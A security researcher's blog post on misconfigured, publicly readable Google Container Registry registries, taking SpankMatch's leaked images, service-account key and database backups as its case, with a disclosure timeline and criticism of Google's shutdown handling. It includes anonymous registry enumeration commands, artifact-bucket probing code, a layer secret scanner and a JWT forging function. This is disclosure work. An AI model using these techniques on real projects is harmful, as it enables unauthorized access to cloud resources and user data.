Since Google Container Registry’s deprecation announcement in May 2023, I’ve observed over 3,000 registries that allow anonymous access, with about 35% of them containing active secrets of some type. About a third of those were found after GCR completely shut down in 2025(!). I’ve sent reports, all very similar to the one below, to more than 100 companies. This included household-name retailers, two cell network providers, three airlines, “magic quadrant” SaaS companies, multiple crypto/defi projects, and even Google itself (dev projects, no customer data, to be clear). Just a wide gamut of “oh shit!”, and almost every contact has said they had not intended to allow public access to their GCR registry.

One of the companies I tried to contact, pretty unsuccessfully as it turned out, was SpankMatch, a networking and collaboration site for adult content creators started in 2022 by SpankChain and ultimately shuttered in 2025. From at least December 2023, when I first attempted to report my findings to them, until May 2025, when SpankMatch was “paused”, an exploitable combination of GCR misconfiguration, poor CI / Docker image build practices, and sloppy secret handling led to:

  • GCP roles/editor access to all cloud resources, including GKE clusters, GCS buckets, and Cloud SQL database instances
  • Access to all uploaded media and user records
  • Impersonation of any SpankMatch user

Even after SpankMatch shut down in May 2025 and Google Container Registry itself shut down in March 2025, the underlying GCR exposure remained. (More on that later in the On Layers & Long Tails section.) While most cloud resources were cleaned up, a final set of database backups remained and appeared to contain all user profile records up until the shutdown. This final, lingering access issue was fixed in late March 2026.

When a company chooses to build an application around the data of a vulnerable population, the privacy and security obligations to those users become paramount. It’s impossible for an average user to evaluate the security of an app; they have little to go on other than the developer’s public statements and responses. Compare my attempted disclosure timeline below with quotes like this one from when SpankMatch was “paused” in May 2025:

A rep elaborated on the safety of user data.

“All user records are safe and will be handled with the highest diligence as SpankChain focuses all of its efforts on helping create a world where such products can thrive,” the rep said. “SpankChain will continue to communicate with regulatory bodies, focusing on advocacy and education while continuing to support promising crypto and adult initiatives.”

I followed up on my initial contact multiple times through 2024, 2025, and 2026 without any response. If you were a SpankMatch user and have any questions about your data, I would suggest reading the privacy policy still linked on spankchain.com or reaching out to them via their contact page. Perhaps you’ll have better luck than I did.

This is a bit of a “twin tracks” post. First, I’m highlighting SpankMatch here as an illustration of the kind of CI and secret handling practices I commonly saw. The other goal is to point out that Google had opportunities (and imo, an obligation) to reach out to their customers about GCR misconfigurations, which would have included SpankMatch, and that GCP fumbled the shutdown of GCR in a manner that left a number of projects in an exposed state.

SpankMatch’s GCR Exposure and Escalation

SpankMatch’s issues are such a capsule example of the kind of problems I was reporting to other organizations that I think it’s useful to quickly walk through them. The initial exposure comes from their GCR registry being misconfigured, allowing public/anonymous enumeration and image pulls (redacting their project-id):

$ curl -s https://gcr.io/v2/<snip>/tags/list | jq
{
  "child": [
    "spankmatch-api",
    "spankmatch-api-2",
    "spankmatch-api-2-staging",
    "spankmatch-api-dev",
    "spankmatch-ui",
    "spankmatch-ui-dev"
  ],
  "manifest": {},
  "name": "<snip>",
  "tags": []
}
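Each entry in child is itself a repository that can be queried the same way (append /tags/list again), so a whole registry tree can be walked anonymously. A minimal sketch of turning one of these responses into fully qualified repo names (the project name here is a stand-in; a real crawler would recurse into each child and mind rate limits):

```python
import json

# A redacted tags/list response, shaped like the one above. "child" holds
# sub-repositories; "tags" would hold image tags at this level.
SAMPLE_RESPONSE = """{
  "child": ["spankmatch-api", "spankmatch-ui"],
  "manifest": {},
  "name": "example-project",
  "tags": []
}"""

def child_repos(response_text, host="gcr.io"):
    """Expand a v2 tags/list response into fully qualified child repo paths."""
    body = json.loads(response_text)
    return [f"{host}/{body['name']}/{c}" for c in body.get("child", [])]

print(child_repos(SAMPLE_RESPONSE))
# → ['gcr.io/example-project/spankmatch-api', 'gcr.io/example-project/spankmatch-ui']
```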

Pulling and running any of these images, spankmatch-api in the snippet below, shows they’ve included the entire current working directory from their build pipeline in the resulting image:

$ ls -1a
.env
.eslintrc.js
.git
.github
.gitignore
.nvmrc
.prettierrc
.sample-env
.vscode
ci-config
db-scripts
docker
Dockerfile
kube
nest-cli.json
package-lock.json
package.json
README.md
spankmatch2-staging-service-account.json
src
test
tsconfig.build.json
tsconfig.json

Besides just the full source code of the API, the image contains the full git history (.git/), the runtime secrets of the API (.env), and a roles/editor-level GCP service account key (spankmatch2-staging-service-account.json). While it initially looks like a Docker build context leak, a surprisingly common issue in (assumed to be) private images, this image was built in GCP Cloud Build and the build manifests are also in the image, so we can check for ourselves:

$ cat ci-config/cloudbuild-prod.yaml
steps:
  # Get .env config file
  - name: 'gcr.io/google.com/cloudsdktool/cloud-sdk'
    args:
      - gsutil
      - cp
      - ${_CONFIG_FILE_URL}
      - .

  # Get Google Credentials for Service Account - Bucket
  - name: 'gcr.io/google.com/cloudsdktool/cloud-sdk'
    args:
      - gsutil
      - cp
      - ${_STORAGE_CONFIG_FILE}
      - .

  # Build docker Image
  - name: gcr.io/cloud-builders/docker
    args:
      - build
      - -t
      - gcr.io/$_CUSTOM_PROJECT/$_CUSTOM_APP_NAME
      - .

  # Push docker Image to registry
  - name: gcr.io/cloud-builders/docker
    args:
      - push
      - gcr.io/$_CUSTOM_PROJECT/$_CUSTOM_APP_NAME

  ...

timeout: 1200s
substitutions:
  _CUSTOM_REGION: us-central1
  _CUSTOM_CLUSTER: spank-match-cluster
  _CUSTOM_APP_NAME: spankmatch-api-2
  _CUSTOM_PROJECT: <snip>

The Cloud Build process copies down the .env (_CONFIG_FILE_URL) and the GCP SA json (_STORAGE_CONFIG_FILE) and then starts a docker build .... So it turns out that the inclusion of the .env and GCP SA json was actually intentional, hence the per-environment image naming convention. Because of this CI and deployment pattern, a single exposed image contained everything needed to escalate directly into their GCP environment. I saw this kind of pattern in hundreds of registries: skipping all external secret management and runtime identity patterns by just baking that shit right in. It’s seemingly endemic to “dev” environments and assumed-private images. (Everyone knows that everybody’s CI sucks, just kicking the VERY dead horse some more.)
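To make the “impersonation of any SpankMatch user” point concrete: if the API signs session tokens with a symmetric HS256 secret kept in that .env, anyone who pulls the image can mint a valid JWT for any account. A stdlib-only sketch, where the secret value and claim names are hypothetical, not SpankMatch’s actual config:

```python
import base64, hashlib, hmac, json

def b64url(data: bytes) -> str:
    # JWTs use unpadded URL-safe base64
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def forge_jwt(secret: bytes, claims: dict) -> str:
    """Mint an HS256 JWT; possession of the signing secret is all it takes."""
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    payload = b64url(json.dumps(claims).encode())
    sig = hmac.new(secret, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{b64url(sig)}"

# Hypothetical secret and claims, standing in for whatever lived in .env:
token = forge_jwt(b"jwt-secret-from-leaked-env", {"sub": "any-user-id", "role": "admin"})
print(token)
```

Rotating the secret invalidates every forged (and legitimate) token, which is why a leaked signing key is an incident, not a cleanup item.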

Since SpankMatch’s issues all started with a misconfigured GCR registry, let’s rewind back to when I first reached out to Google after I noticed the high rate of misconfig’ed GCR registries in the wild.

“The product team has currently not expressed interest in proactively reaching out to users.”

In May 2023, as part of the lead up to the talk I gave at DEF CON 31’s Cloud Village (Call Me Phishmael: Hunting Sensitive Docker Images in Google Container Registry Leaks), I submitted a Google VRP report pointing out that a number of factors combined to make the current state of GCR, well, pretty crappy:

  • The GCP Console UI provided a single button that controlled the private/public visibility of the entire registry with no user confirmation.
  • Registry names are based entirely on the GCP project’s project-id. The project-id is defined by the project’s owner, is used in a number of public places by other GCP services, and is relatively easy to discover/harvest.
  • Each GCR registry creates a GCS bucket that’s used to store layer blobs and the bucket names are also deterministic: registry gcr.io/<project-id> -> bucket artifacts.<project-id>.appspot.com. The access policies for these buckets mirror the visibility of the GCR registry, so gcr.io rate limits can be skipped by using the GCS API to look for the artifact buckets. (These buckets are also classic cloud “shadow resources”. They’re created by the GCR service but exist in user space and can be directly misconfigured or broken by the project owner.)
  • Other GCP services, Google App Engine (GAE) and Google Cloud Functions (GCF), use GCR as scratch space and will do so regardless of the registry’s public/private setting. That means when a GCR registry becomes public, so do any past or future GAE and GCF deployments.
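The deterministic bucket naming in the third point is worth making concrete: a harvested project-id converts directly into a handful of candidate bucket names that can be probed anonymously via the GCS API, skipping gcr.io entirely. A sketch, where the prefixes cover the common GCR multi-region hosts and example-project is a stand-in:

```python
# GCR backs each registry host with a GCS bucket whose name is derived
# from the project-id; "" covers gcr.io, the rest the regional hosts.
GCR_PREFIXES = ["", "us.", "eu.", "asia."]

def candidate_buckets(project_id):
    return [f"{p}artifacts.{project_id}.appspot.com" for p in GCR_PREFIXES]

def listing_url(bucket):
    # An anonymous GET here succeeds only if the bucket allows public listing.
    return f"https://storage.googleapis.com/storage/v1/b/{bucket}/o"

for bucket in candidate_buckets("example-project"):
    print(listing_url(bucket))
```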

To illustrate my point, I included a list of 200-odd projects that were currently leaking GAE or GCF images and had taken less than a day to find. Google identified the report as an “Abuse Risk” and we did a little back-and-forth about which projects had been accessed, whether my talk had been accepted, what the content and title of my talk would be, etc. (I didn’t consider this report an exploit at all, but instead just kinda a heads up that GCR had become a soft spot and was ripe for abuse.) Eventually in July 2023 Google posted their final update:

Google Vulnerability Reward Program panel has decided to issue a reward of $X for your report. Congratulations! Rationale for this decision: Exploitation likelihood is low. Issue qualified as an abuse-related methodology with medium impact.

While we cannot determine which of these buckets were mistakenly misconfigured (as opposed to intentionally configured), this helped us improve product clarity for which we are issuing a reward.

More or less what I’d expected, but I thought the odds of registries being “intentionally configured” to leak their own GAE and GCF images were pretty fuckin’ low. So I asked a follow-up question:

I can only characterize Google’s reply as “lol nope!”:

So this was basically the state of GCR up until the day before my talk at the DC Cloud Village. That’s when Google rolled out a change to completely remove the public/private switch from the UI and instead required users to directly change the permissions on the GCS artifact bucket itself.

Right here is the point where I believe Google absolutely failed the spirit of their own Shared Responsibility Model by not notifying project owners of public GCR registries. They seem to have realized that their initial design caused GCR users to accidentally put themselves into a dangerous position, but after addressing it they then failed to reach out to those very same users.

But hey, at least GCR was getting replaced by Google Artifact Registry (GAR) and was slated for final shutdown in 2025. That means all those public registries would get closed, right? Right?

On Layers & Long Tails

During the GCR to Google Artifact Registry transition period, it was the project owner’s responsibility to transfer their images from GCR to GAR if they wanted to keep them or continue to use the gcr.io registry hostnames (they would get forwarded over to GAR). To that end, Google provided an “automatic migration tool”. One thing the tool didn’t do was clean up the storage bucket that held layer blobs (<region>.artifacts.<project-id>.appspot.com); that was left up to the project owner:

When you are ready to stop using Container Registry, delete the remaining images by deleting the storage buckets for Container Registry.

When redirection is enabled, commands to delete images in gcr.io paths delete images in the corresponding Artifact Registry gcr.io repository, but they don’t delete images stored on Container Registry hosts.

To safely remove all Container Registry images, delete the Cloud Storage buckets for each Container Registry hostname.

What that means is that after the GCR shutdown, artifact buckets were orphaned and public buckets stayed public. A bucket the user didn’t create, backing a managed service that no longer exists. This was the position SpankMatch ended up in, with everything supposedly shut down but the artifact bucket still public.

Even worse, during the transition and shutdown phase I saw hundreds of previously secure artifact buckets become public and stay public. I assume this was due to project owners struggling with the GAR migration process and fumbling the IAM permissions.

These layers are also basically useless to project owners. The corresponding image manifests were destroyed with the final shutdown of GCR so you wouldn’t be able to reconstruct the Docker images the layers initially belonged to. The orphaned buckets are just big piles of random filesystems containing god knows what.
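Useless to owners, maybe, but not to anyone else: each orphaned blob is still a tar archive that can be swept for secret-looking paths, no manifests required. A minimal sketch against a synthetic layer, with filename patterns that are my own illustrative picks, not an exhaustive list:

```python
import io
import re
import tarfile

# Filenames worth flagging inside a layer; illustrative, not exhaustive.
SECRET_NAMES = re.compile(r"(\.env$|service-account.*\.json$|id_rsa$)")

def suspicious_members(layer: bytes) -> list:
    """List filenames inside a (gzipped) layer tarball that look secret-bearing."""
    with tarfile.open(fileobj=io.BytesIO(layer), mode="r:*") as tf:
        return [m.name for m in tf.getmembers() if SECRET_NAMES.search(m.name)]

# Build a tiny in-memory layer to demonstrate against:
buf = io.BytesIO()
with tarfile.open(fileobj=buf, mode="w:gz") as tf:
    for name in ["app/.env", "app/src/main.ts", "app/sa-service-account.json"]:
        data = b"example"
        info = tarfile.TarInfo(name)
        info.size = len(data)
        tf.addfile(info, io.BytesIO(data))

print(suspicious_members(buf.getvalue()))
# → ['app/.env', 'app/sa-service-account.json']
```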

I understand this ultimately may be a minor gripe (or just spitting into the ocean of larger security concerns). Maybe the GCP projects I found aren’t the tip of an iceberg, but only Google is in the position to actually know. Just send your customers an email, damn.

SpankMatch Disclosure Timeline

  • 12-01-2023 - Emailed [email protected], asking for an existing VRP or an appropriate security contact
  • 12-01-2023 - Response from [email protected] saying if I “report an issue from staging we will look into it, but we only pay bounties for bugs found on the production server”
  • 12-01-2023 - Sent original writeup, demonstrating SA key leak, production asset/resources access, production user spoofing via JWT forgery
  • 12-20-2023 - Emailed [email protected] for followup, no response
  • 02-24-2024 - Emailed help|[email protected] re-iterating original report and that initial registry leak is still open, no response
  • 08-30-2025 - Emailed help|support|private|[email protected] reporting that registry bucket is still open to the public and still leaking active credentials, no response
  • 03-10-2026 - Emailed help|support|private|[email protected] and three user emails @spankchain.com from DB backup with updated writeup, no response
  • 03-13-2026 - Reached out via Contact form @ https://www.spankchain.com/contact, no response
  • 03-14-2026 - Reached out via Bluesky, SpankChain replied “Ok great we’ll take a look and get back to you!”, never contacted me
  • 03-23-2026 - Reached out again via Bluesky @ https://bsky.app/profile/amenbreakpoint.com/post/3mhqkt4ed7s2n, no response
  • 04-02-2026 - Checked and issue fixed, probably sometime after 3/26